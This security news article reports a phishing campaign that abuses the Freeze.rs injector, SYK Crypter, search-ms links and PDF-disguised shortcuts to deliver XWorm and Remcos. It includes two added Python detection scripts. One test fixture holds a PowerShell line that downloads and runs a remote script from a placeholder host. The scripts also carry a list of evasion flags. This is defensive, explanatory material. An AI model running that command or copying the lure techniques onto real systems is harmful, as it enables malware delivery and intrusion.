Freeze[.]rs Injector Weaponized for XWorm Malware Attacks


Aug 10, 2023 | THN | Malware / Cyber Threat


Malicious actors are using a legitimate Rust-based injector called Freeze[.]rs to deploy a commodity malware called XWorm in victim environments.

The novel attack chain, detected by Fortinet FortiGuard Labs on July 13, 2023, is initiated through a phishing email containing a booby-trapped PDF file. It has also been used to introduce Remcos RAT by means of a crypter called SYK Crypter, which was first documented by Morphisec in May 2022.

"This file redirects to an HTML file and uses the 'search-ms' protocol to access an LNK file on a remote server," security researcher Cara Lin said. "Upon clicking the LNK file, a PowerShell script executes Freeze[.]rs and SYK Crypter for further offensive actions."

Freeze[.]rs, released on May 4, 2023, is an open-source red teaming tool from Optiv that functions as a payload creation tool used for circumventing security solutions and executing shellcode in a stealthy manner.


"Freeze[.]rs uses multiple techniques to not only remove Userland EDR hooks, but to also execute shellcode in such a way that it circumvents other endpoint monitoring controls," according to a description shared on GitHub.

SYK Crypter, on the other hand, is a tool employed to distribute a wide variety of malware families such as AsyncRAT, NanoCore RAT, njRAT, QuasarRAT, RedLine Stealer, and Warzone RAT (aka Ave Maria). It is retrieved from the Discord content delivery network (CDN) by means of a .NET loader attached to emails that masquerade as benign purchase orders.

"This attack chain delivers a crypter that's persistent, features multiple layers of obfuscation, and uses polymorphism to maintain its ability to evade detection by security solutions," Morphisec researcher Hido Cohen explained.


It's worth noting that the abuse of the "search-ms" URI protocol handler was recently highlighted by Trellix, which unearthed infection sequences bearing HTML or PDF attachments that run searches against an attacker-controlled server and list malicious files in the Windows File Explorer as if they were local search results.
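The search-ms abuse described in Lin's quote and in the Trellix finding above, as an added detection example that is not from the original article, from Fortinet or from Trellix: it pulls every search-ms: URI out of HTML lure source, parses the query/crumb/displayname parameters, and flags any URI whose crumb=location: points Explorer at a UNC or WebDAV share instead of a local path. The sample HTML, the hosts 203.0.113.10 and 198.51.100.7, and the file names are constructed placeholders.

```python
"""Flag search-ms: URIs in HTML lures that aim Explorer at an attacker-controlled share.

Added example, not code from the article or the vendors it cites.
"""
import html
import re
from urllib.parse import unquote

# In page source a search-ms: URI runs until whitespace, a quote or a tag delimiter.
SEARCH_MS_RE = re.compile(r"""search-ms:[^\s"'<>]+""", re.IGNORECASE)


def parse_search_ms(uri):
    """Split 'search-ms:key=value&key=value' into a dict of lists (crumb may repeat)."""
    params = {}
    body = uri.split(":", 1)[1]
    for part in body.split("&"):
        key, _, value = part.partition("=")
        params.setdefault(key.strip().lower(), []).append(unquote(value))
    return params


def remote_locations(params):
    """Return crumb=location: targets that are UNC or WebDAV paths (\\\\host\\share, \\\\host@80\\share)."""
    hits = []
    for crumb in params.get("crumb", []):
        kind, _, target = crumb.partition(":")
        if kind.strip().lower() == "location" and target.startswith(("\\\\", "//")):
            hits.append(target)
    return hits


def scan_html(text):
    """Find every search-ms: URI in the page and mark those that search a remote location."""
    findings = []
    for match in SEARCH_MS_RE.finditer(html.unescape(text)):
        uri = match.group(0)
        params = parse_search_ms(uri)
        remote = remote_locations(params)
        findings.append({
            "uri": uri,
            "query": params.get("query", [""])[0],
            # A displayname such as "Downloads" makes the remote listing look like a local folder.
            "displayname": params.get("displayname", [""])[0],
            "remote_locations": remote,
            "suspicious": bool(remote),
        })
    return findings


# Constructed HTML lure (hypothetical hosts from the documentation address ranges), not a real sample.
SAMPLE_HTML = r"""<html><body>
<p>Your purchase order is ready. Open it from the folder that appears.</p>
<a href="search-ms:query=PO-2023&amp;crumb=location:\\203.0.113.10@80\share&amp;displayname=Downloads">Open</a>
<meta http-equiv="refresh" content="0;url=search-ms:query=Invoice&amp;crumb=location:\\198.51.100.7\docs&amp;displayname=Desktop">
<a href="search-ms:query=report&amp;crumb=location:C:\Users\Public">local search</a>
</body></html>"""


if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        print("SUSPICIOUS" if f["suspicious"] else "ok", f["displayname"], f["remote_locations"])
```

The local `C:\Users\Public` search is the benign shape of the same handler, so the signal is not search-ms itself but a remote location crumb reached from web or mail content, typically paired with a displayname that imitates a local folder. Where the handler is not needed, one commonly recommended mitigation is to remove or restrict the search-ms protocol registration under HKEY_CLASSES_ROOT.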


The findings from Fortinet are no different in that the files are camouflaged as PDF files but are actually LNK files that execute a PowerShell script to launch the Rust-based injector, while displaying a decoy PDF document.
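The PDF-that-is-really-an-LNK lure described above, as an added triage example that is not code from the article or from Fortinet: it checks whether an attachment with a PDF-looking name actually carries the fixed Windows shell link header (HeaderSize 0x4C followed by the LinkCLSID 00021401-0000-0000-C000-000000000046), and for shortcuts it hunts for PowerShell launcher strings in both ASCII and the UTF-16LE form that LNK string data normally uses. The sample attachments, their names, and the host 203.0.113.10 are constructed and the "shortcuts" are header-only stand-ins, not real shortcuts or malware.

```python
"""Triage e-mail attachments that claim to be PDFs but carry a Windows shortcut (LNK) header.

Added example; the sample "files" below are constructed in-line and are not real malware.
"""
import struct

LNK_HEADER_SIZE = 0x4C
# LinkCLSID 00021401-0000-0000-C000-000000000046 as laid out on disk
# (first three GUID fields little-endian, the remaining bytes in order).
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
PDF_MAGIC = b"%PDF-"
# Heuristic markers for a PowerShell launcher; LNK string data is normally UTF-16LE,
# so each marker is checked in both ASCII and UTF-16LE form.
PS_MARKERS = ("powershell", "pwsh", "-enc", "executionpolicy", "bypass", "hidden")


def is_lnk(data):
    """A shell link starts with HeaderSize 0x4C followed by the fixed LinkCLSID."""
    return (len(data) >= LNK_HEADER_SIZE
            and data[:4] == struct.pack("<I", LNK_HEADER_SIZE)
            and data[4:20] == LNK_CLSID)


def is_pdf(data):
    """The PDF spec tolerates junk before the signature, so look within the first 1 KiB."""
    return PDF_MAGIC in data[:1024]


def powershell_markers(data):
    low = data.lower()  # bytes.lower() folds ASCII only, which is all the markers need
    return sorted(m for m in PS_MARKERS
                  if m.encode("ascii") in low or m.encode("utf-16-le") in low)


def triage(filename, data):
    """Classify one attachment. A PDF-looking name over an LNK header is the lure shape in the article."""
    name = filename.lower()
    claims_pdf = name.endswith(".pdf") or ".pdf." in name  # e.g. Purchase_Order.pdf.lnk
    lnk = is_lnk(data)
    return {
        "file": filename,
        "claims_pdf": claims_pdf,
        "is_pdf": is_pdf(data),
        "is_lnk": lnk,
        "powershell_markers": powershell_markers(data) if lnk else [],
        "suspicious": claims_pdf and lnk,
    }


def _fake_lnk(arguments):
    """Constructed artifact: a valid 0x4C-byte header plus UTF-16LE text, not a complete shortcut."""
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID
    header += b"\x00" * (LNK_HEADER_SIZE - len(header))
    return header + arguments.encode("utf-16-le")


# Constructed sample attachments (hypothetical names, contents and host).
SAMPLES = {
    "Purchase_Order.pdf.lnk": _fake_lnk(
        'powershell.exe -w hidden -ep bypass -c "iwr http://203.0.113.10/stage.ps1 | iex"'),
    "Invoice.pdf": b"%PDF-1.7\n1 0 obj\n<< /Type /Catalog >>\nendobj\n",
    "Quote.pdf": _fake_lnk("notepad.exe"),
}


if __name__ == "__main__":
    for fname, blob in SAMPLES.items():
        print(triage(fname, blob))
```

The name check is deliberately loose: Explorer hides the `.lnk` extension, so `Purchase_Order.pdf.lnk` is displayed as `Purchase_Order.pdf`, and a name that merely contains `.pdf.` deserves the same scrutiny as one that ends in it. The marker hunt is a heuristic for quick sorting; a full LNK parser that walks the header flags to the command-line arguments and icon location would give the exact PowerShell line and the decoy-PDF icon trick.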

In the final stage, the injected shellcode is decrypted to execute the XWorm remote access trojan and harvest sensitive data, such as machine information, screenshots, and keystrokes, and remotely control the compromised system.

The fact that a three-month-old program is already being weaponized in attacks illustrates how quickly malicious actors adopt offensive tools to fulfill their objectives.

That's not all. The PowerShell script, besides loading the injector, is configured to run another executable, which functions as a dropper by contacting a remote server to fetch the SYK Crypter containing the encrypted Remcos RAT malware.

"The combination of XWorm and Remcos creates a formidable trojan with an array of malicious functionalities," Lin said. "The C2 server's traffic report […] reveals Europe and North America as the primary targets of this malicious campaign."
